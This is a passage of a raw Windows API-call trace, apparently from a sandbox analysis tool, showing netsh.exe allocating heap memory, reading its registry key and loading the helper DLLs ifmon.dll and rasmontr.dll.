RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60300 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ffe0 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a602e0 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60120 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fe20 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fd60 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a601c0 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60160 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60080 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60340 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60260 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60460 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fee0 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60020 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ff00 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60380 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60060 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ff40 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ff20 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.284] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a600c0 [0136.284] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60100 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5ff60 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fe40 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60140 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60220 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60180 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a601a0 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60280 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a603c0 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60420 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fd20 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fd80 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fdc0 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fde0 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a5fe00 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a605d0 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60710 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60730 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60ad0 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a606d0 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.285] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60750 [0136.285] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60af0 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60a50 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60610 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60790 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60c50 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60650 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60530 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60c70 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60c10 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a605b0 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60bb0 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60770 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60b30 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60bf0 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a608d0 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60630 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60850 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60a30 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a607f0 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60870 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60b10 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.286] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60b90 [0136.286] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a608f0 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60a70 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a607b0 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a605f0 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60690 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60910 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60a90 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a604f0 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60810 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60670 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a606f0 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a607d0 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60ab0 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a606b0 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60b50 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60b70 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60bd0 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60510 [0136.287] GetProcessHeap () returned 0x1cff6a50000 [0136.287] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60930 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60c30 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60830 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60550 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a609d0 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60890 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a608b0 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60570 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60590 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60950 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60970 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60990 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a609b0 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a609f0 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60a10 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61260 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.288] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a613a0 [0136.288] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61220 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a610a0 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61200 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60d80 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60de0 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60ec0 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61140 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61180 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61020 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60f20 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a610c0 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60e40 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60fc0 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60ee0 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60e60 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a610e0 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61280 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61040 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a613e0 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60fe0 [0136.289] GetProcessHeap () returned 0x1cff6a50000 [0136.289] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61100 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a60e80 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61440 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61160 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a61060 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x10) returned 0x1cff6a612a0 [0136.290] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0136.290] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x28) returned 0x1cff6a588b0 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x2) returned 0x1cff6a5da90 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x14) returned 0x1cff6a61300 [0136.290] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x58) returned 0x1cff6a556b0 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xb0) returned 0x1cff6a55030 [0136.290] GetProcessHeap () returned 0x1cff6a50000 [0136.290] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a556b0) returned 1 [0136.290] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x7ffe67a40000 [0136.292] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x3e092f7828 | out: phkResult=0x3e092f7828*=0xb4) returned 0x0 [0136.293] RegQueryInfoKeyW (in: hKey=0xb4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x3e092f7860, lpcbMaxValueNameLen=0x3e092f7870, lpcbMaxValueLen=0x3e092f7868, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x3e092f7860*=0x14, lpcbMaxValueNameLen=0x3e092f7870, lpcbMaxValueLen=0x3e092f7868, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0136.293] GetProcessHeap () returned 0x1cff6a50000 [0136.293] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x8, Size=0x16) returned 0x1cff6a613c0 [0136.293] GetProcessHeap () returned 0x1cff6a50000 [0136.293] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x8, Size=0x23) returned 0x1cff6a58940 [0136.293] RegEnumValueW (in: hKey=0xb4, dwIndex=0x0, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="2", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.293] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0136.293] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0136.293] GetProcessHeap () returned 0x1cff6a50000 [0136.293] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x50) returned 0x1cff6a61930 [0136.293] GetProcessHeap () returned 0x1cff6a50000 [0136.293] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x4) returned 0x1cff6a5db50 [0136.293] GetProcessHeap () returned 0x1cff6a50000 [0136.293] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x14) returned 0x1cff6a61080 [0136.293] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0136.293] GetProcessHeap () returned 0x1cff6a50000 [0136.293] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a588b0) returned 1 [0136.293] LoadLibraryExW (lpLibFileName="IFMON.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe62c00000 [0136.310] GetProcAddress (hModule=0x7ffe62c00000, lpProcName="InitHelperDll") returned 0x7ffe62c01310 [0136.310] InitHelperDll () returned 0x0 [0136.314] RegisterHelper () returned 0x0 [0136.314] GetProcessHeap () returned 0x1cff6a50000 [0136.314] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x108) returned 0x1cff6a542e0 [0136.314] GetProcessHeap () returned 0x1cff6a50000 [0136.314] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a55030) returned 1 [0136.334] RegEnumValueW (in: hKey=0xb4, dwIndex=0x1, lpValueName=0x1cff6a613c0, lpcchValueName=0x3e092f7820, lpReserved=0x0, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878 | out: lpValueName="4", lpcchValueName=0x3e092f7820, lpType=0x0, lpData=0x1cff6a58940, lpcbData=0x3e092f7878) returned 0x0 [0136.334] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0136.334] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0136.334] GetProcessHeap () returned 0x1cff6a50000 [0136.334] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x78) returned 0x1cff6a55030 [0136.334] GetProcessHeap () returned 0x1cff6a50000 [0136.334] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x4) returned 0x1cff6a5db70 [0136.334] GetProcessHeap () returned 0x1cff6a50000 [0136.334] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1a) returned 0x1cff6a588e0 [0136.334] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0136.335] GetProcessHeap () returned 0x1cff6a50000 [0136.335] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a61930) returned 1 [0136.335] LoadLibraryExW (lpLibFileName="RASMONTR.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffe5ff60000 [0136.476] LoadLibraryExA (lpLibFileName="MSVCRT.DLL", hFile=0x0, dwFlags=0x800) returned 0x7ffe6a810000 [0136.477] GetVersion () returned 0x3ad7000a [0136.477] SetErrorMode (uMode=0x0) returned 0x0 [0136.477] SetErrorMode (uMode=0x8001) returned 0x0 [0136.477] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x1cff6a72bc0 [0136.477] LocalFree (hMem=0x1cff6a72bc0) returned 0x0 [0136.477] GetVersion () returned 0x3ad7000a [0136.479] GlobalLock (hMem=0x1cff83d0008) returned 0x1cff6a72bc0 [0136.479] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x1cff6a72de0 